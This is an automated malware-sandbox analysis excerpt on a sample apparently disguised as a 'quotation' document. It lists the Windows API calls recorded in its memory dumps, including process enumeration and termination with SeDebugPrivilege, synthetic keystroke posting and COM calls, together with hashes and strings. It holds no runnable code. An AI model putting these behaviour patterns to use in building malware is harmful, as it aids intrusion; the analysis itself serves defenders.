                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F725DB
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F725DF
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F725E9
                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F72601
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F72605
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F7260F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F72623
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F72627
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2014098862-0
                                                                                                                    • Opcode ID: fcdfe46a15eace38c18286515297db68d15f4388ad07d566153e180714d16f1f
                                                                                                                    • Instruction ID: 0103ebe7966df56a01e725198c7ae714967b8a62b7327e0e3c811e88df6041e7
                                                                                                                    • Opcode Fuzzy Hash: fcdfe46a15eace38c18286515297db68d15f4388ad07d566153e180714d16f1f
                                                                                                                    • Instruction Fuzzy Hash: C801D471390214BBFB1067699C8AF593F69DB4EB12F104006F318AE1D1C9F22445AAAA
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F71449,?,?,00000000), ref: 00F7180C
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00F71449,?,?,00000000), ref: 00F71813
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71449,?,?,00000000), ref: 00F71828
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F71449,?,?,00000000), ref: 00F71830
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00F71449,?,?,00000000), ref: 00F71833
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71449,?,?,00000000), ref: 00F71843
                                                                                                                    • GetCurrentProcess.KERNEL32(00F71449,00000000,?,00F71449,?,?,00000000), ref: 00F7184B
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00F71449,?,?,00000000), ref: 00F7184E
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00F71874,00000000,00000000,00000000), ref: 00F71868
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 365aa92c231d043644f68200c0cb88fa6f828803c2c4824537a9a018a3a70120
                                                                                                                    • Instruction ID: 28a819be54d583c1865336f2e088798c497c78679083e1733c3522d3fbb1aac0
                                                                                                                    • Opcode Fuzzy Hash: 365aa92c231d043644f68200c0cb88fa6f828803c2c4824537a9a018a3a70120
                                                                                                                    • Instruction Fuzzy Hash: 9C01BBB5340308BFE710ABA5DC4DF6B3BACEB8AB11F008411FA05DB1A2DA709804DB61
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F7D501
                                                                                                                      • Part of subcall function 00F7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F7D50F
                                                                                                                      • Part of subcall function 00F7D4DC: CloseHandle.KERNEL32(00000000), ref: 00F7D5DC
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9A16D
                                                                                                                    • GetLastError.KERNEL32 ref: 00F9A180
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9A1B3
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F9A268
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00F9A273
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9A2C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 2f03730df517f78303f8000dab91c0bc6dcbc4962bab23cd2e0ee50e26dee448
                                                                                                                    • Instruction ID: d394f3ca51b79ebf282b3ea1afb8d327e2b7b5f937bb4e2e13b0837f7fce0c27
                                                                                                                    • Opcode Fuzzy Hash: 2f03730df517f78303f8000dab91c0bc6dcbc4962bab23cd2e0ee50e26dee448
                                                                                                                    • Instruction Fuzzy Hash: EB6171716082419FEB20DF14C894F55BBE1AF44318F14849CE4668B7A3C776ED85DBD2
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FA3925
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FA393A
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FA3954
                                                                                                                    • _wcslen.LIBCMT ref: 00FA3999
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FA39C6
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FA39F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 2147712094-78025650
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7BCFD
• IsMenu.USER32(00000000), ref: 00F7BD1D
• CreatePopupMenu.USER32 ref: 00F7BD53
• GetMenuItemCount.USER32(01235688), ref: 00F7BDA4
• InsertMenuItemW.USER32(01235688,?,00000001,00000030), ref: 00F7BDCC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00F7C913
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _wcslen$LocalTime
• String ID:
• API String ID: 952045576-0
APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00F2F953
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00F6F3D1
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00F6F454
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
• DeleteObject.GDI32(00000000), ref: 00FA2D1B
• GetDC.USER32(00000000), ref: 00FA2D23
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA2D2E
• ReleaseDC.USER32(00000000,00000000), ref: 00FA2D3A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FA2D76
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FA2D87
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FA5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00FA2DC2
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FA2DE1
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F515CE
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51651
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F517FB,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F516E4
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F516FB
  • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51777
• __freea.LIBCMT ref: 00F517A2
• __freea.LIBCMT ref: 00F517AE
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                    • Opcode ID: e804302d19f261b518d02fb87093b85c144ecb98c30a4ae9bbba2d26dd97b645
                                                                                                                    • Instruction ID: 94bb87955a0463bfc19786c3533d2a38733ae4ee93ffe0b21530e9217cc1ed46
                                                                                                                    • Opcode Fuzzy Hash: e804302d19f261b518d02fb87093b85c144ecb98c30a4ae9bbba2d26dd97b645
                                                                                                                    • Instruction Fuzzy Hash: A291B771E00219ABEF20CFA4CC44FAEBBB8EF56714F108559F505AB280D770A946DFA1
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F8125C
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81284
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F812A8
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F812D8
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F8135F
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F813C4
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F81430
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2550207440-0
                                                                                                                    • Opcode ID: 485eafd476fea40522bee4a706f2d45dc2404908f051b38940def609625d6f52
                                                                                                                    • Instruction ID: 6b38385ff9411a9636103e4a63d7dc3bf40207086bd97d09e8a8345c36526e68
                                                                                                                    • Opcode Fuzzy Hash: 485eafd476fea40522bee4a706f2d45dc2404908f051b38940def609625d6f52
                                                                                                                    • Instruction Fuzzy Hash: 7391C272E002199FDB00EF94C885BFE77B9FF45325F104229E941E7291D778A946EB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 549f8a9e9d861e3b2907f01010d564efe30234088d19b88c2a1d2d5402707779
                                                                                                                    • Instruction ID: 7d4b89ee59907418fb174a032eb3819e842b92990d563aa5aa780fd55af1c653
                                                                                                                    • Opcode Fuzzy Hash: 549f8a9e9d861e3b2907f01010d564efe30234088d19b88c2a1d2d5402707779
                                                                                                                    • Instruction Fuzzy Hash: BC914871E04219EFCB10CFA9DC85AEEBBB8FF49320F148059E515B7251D378A941EBA0
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F9396B
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00F93A7A
                                                                                                                    • _wcslen.LIBCMT ref: 00F93A8A
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F93C1F
                                                                                                                      • Part of subcall function 00F80CDF: VariantInit.OLEAUT32(00000000), ref: 00F80D1F
                                                                                                                      • Part of subcall function 00F80CDF: VariantCopy.OLEAUT32(?,?), ref: 00F80D28
                                                                                                                      • Part of subcall function 00F80CDF: VariantClear.OLEAUT32(?), ref: 00F80D34
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                    • Opcode ID: 999ff6d1c2a13fbb65f396f97929b41fd6c0eb77a9cc133ebf259a54d12c7621
                                                                                                                    • Instruction ID: ccd4b0fbb3be60eaf5fd622efe662425e5041474c5230bf42fea6241d6c197aa
                                                                                                                    • Opcode Fuzzy Hash: 999ff6d1c2a13fbb65f396f97929b41fd6c0eb77a9cc133ebf259a54d12c7621
                                                                                                                    • Instruction Fuzzy Hash: BB917B75A083059FCB10EF64C88096AB7E5FF89314F14892DF8899B351DB34EE45EB92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?,?,00F7035E), ref: 00F7002B
                                                                                                                      • Part of subcall function 00F7000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70046
                                                                                                                      • Part of subcall function 00F7000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70054
                                                                                                                      • Part of subcall function 00F7000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?), ref: 00F70064
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F94C51
                                                                                                                    • _wcslen.LIBCMT ref: 00F94D59
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F94DCF
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00F94DDA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                    • Opcode ID: ef3d8222cdcc792c828dc3151972103bea02674798da7780be643f59ed8420a0
                                                                                                                    • Instruction ID: 3c27347625ea8f887a0e43f5ddad71b57a4f6df0c18c7719aaffc343edef88e6
                                                                                                                    • Opcode Fuzzy Hash: ef3d8222cdcc792c828dc3151972103bea02674798da7780be643f59ed8420a0
                                                                                                                    • Instruction Fuzzy Hash: D7911771D0021DAFEF10DFA4CC90EEDB7B8BF08310F10816AE915A7251DB34AA459FA0
                                                                                                                    APIs
                                                                                                                    • GetMenu.USER32(?), ref: 00FA2183
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00FA21B5
                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FA21DD
                                                                                                                    • _wcslen.LIBCMT ref: 00FA2213
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00FA224D
                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00FA225B
